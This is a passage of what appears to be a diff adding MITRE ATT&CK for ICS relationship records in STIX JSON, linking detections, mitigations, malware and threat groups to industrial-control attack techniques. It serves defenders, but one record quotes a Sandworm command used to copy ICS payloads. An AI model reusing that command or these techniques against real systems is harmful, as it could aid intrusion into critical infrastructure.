", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ceafc04b-b31f-419b-82da-41ce9e1ec6e9", + "created": "2022-09-23T16:36:40.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:50:45.583Z", + "description": "Engineering and asset management software will often maintain a copy of the expected program loaded on a controller and may also record any changes made to controller programs and tasks. Data from these platforms can be used to identify modified controller tasking.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a86cee0a-dc49-4c95-b5dc-37405337490b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.079Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. 
Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--98b229f8-6020-4fbb-b104-54fd478c14d9", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:29:49.652Z", + "description": "Monitor logon sessions for default credential use.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--26e58427-a2bd-4e77-9939-16ef60a072e7", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:49:04.746Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + 
"x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--07c0e166-f05e-413f-8f3e-f487317c9626", + "created": "2023-03-22T15:53:59.953Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-22T15:53:59.953Z", + "description": "Devices and programs that receive command messages from remote systems (e.g., control servers) should verify those commands before taking any actions on them.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f862418a-e7b4-4783-8949-7145f3dee665", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--26254163-4f25-4d30-8456-ca093459ff32", + "created": "2022-05-11T16:22:58.807Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:29.856Z", + "description": "Monitor for newly executed processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a28ecd81-a7dd-404c-9d7b-ce670b0fc83b", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:50:54.867Z", + "description": "On Windows and Unix systems monitor executed commands and arguments that may use shell commands for execution. 
Shells may be common on administrator, developer, or power user systems depending on job function.\n\nOn network device and embedded system CLIs consider reviewing command history if unauthorized or suspicious commands were used to modify device configuration.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--33215dfa-53d0-4bd7-a15d-cec9315c7c4d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.130Z", + "relationship_type": "mitigates", + "description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Steps should be taken to periodically inventory internet accessible devices to determine if it differs from the expected.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--692324b4-064a-430c-8ffc-7f7acd537778", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 
2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:10:47.409Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038) downloads additional modules for the collection of data in information repositories, including the Infostealer 2 module that can access data from Windows Shares.(Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5901e8b3-7df0-43e0-bdc5-f4fd2792a572", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:17:25.451Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. 
The adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T0859) to login and may perform follow-on actions that spawn additional processes as the user.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b182692b-5eb3-4edc-b455-1f92d64b98ec", + "created": "2022-09-26T15:38:45.913Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:38:45.913Z", + "description": "Monitor for loss of expected device alarms which could indicate alarms are being suppressed. As noted in the technique description, there may be multiple sources of alarms in an ICS environment. Discrepancies between alarms may indicate the adversary is suppressing some but not all the alarms in the environment. 
This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2057ec71-a94f-49cc-b348-2eeb44899afd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:40:20.312Z", + "description": "Monitor for changes made to a large quantity of files for unexpected modifications in both user directories and directories used to store programs and OS components (e.g., C:\\Windows\\System32). 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--104b4f25-d0a9-41f6-94b3-fa85ee8b1523", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.229Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a618d7e4-23f0-4b8c-9f09-78d04ea7fc55", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:14:57.034Z", + "description": "Monitor for alarm setting changes observable in automation or management network protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + 
"x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--49966e16-04a2-4fd7-86cd-aa934040a9d8", + "created": "2023-03-31T17:44:19.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T19:50:55.445Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used a VBS script to facilitate lateral tool transfer. 
The VBS script was used to copy ICS-specific payloads with the following command: `cscript C:\\Backinfo\\ufn.vbs C:\\Backinfo\\101.dll C:\\Delta\\101.dll`(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c12b1d6-d636-45c6-98f4-947ddb502cb0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:11:33.323Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. 
This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022", + "created": "2022-09-27T17:39:15.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:24.399Z", + "description": "Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as Server Message Block (SMB).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6e3c2c04-0838-4863-80a7-d73ef5ac6a64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.220Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. 
If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c4e8dd42-9855-4a36-b915-dc7e1a91e235", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:03.970Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) has embedded a macro within spearphishing attachments that has been made up of both a VBScript and a PowerShell script.(Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 
"relationship--2e5f338d-92c4-4647-8fef-7c901ff774f5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.220Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to interact and collect information from databases. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--cf703ecc-e9f5-4d56-94d4-8fda9837e614", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-28T18:44:20.611Z", + "description": "Monitor for unexpected ICS protocol functions from new and existing devices. 
Monitoring known devices requires ICS function level insight to determine if an unauthorized device is issuing commands (e.g., a historian).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--655e2f91-5d43-4c47-b7e0-8248b351f3ba", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:49:07.316Z", + "description": "Monitor device alarms that indicate the devices has been placed into Firmware Update Mode, although not all devices produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + 
"target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--fa1bde35-63d9-4c5c-969b-2c17c29089fa", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:28:50.588Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7aa93b40-80da-4bb6-8a7c-88e5f5e44669", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.157Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + 
"target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8b2d82aa-75fc-4d6d-bb4b-9f600bd211fd", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:27:15.545Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) uses TriStations default UDP port, 1502, to communicate with devices. (Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bcece7ce-91b5-40b3-b87a-25cab3600e5c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 
2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:16:10.677Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) attempts to contact command and control servers on port 80 to send basic information about the computer it has compromised. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--228b9a13-0545-4ecf-99ff-be02addaf7fe", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": 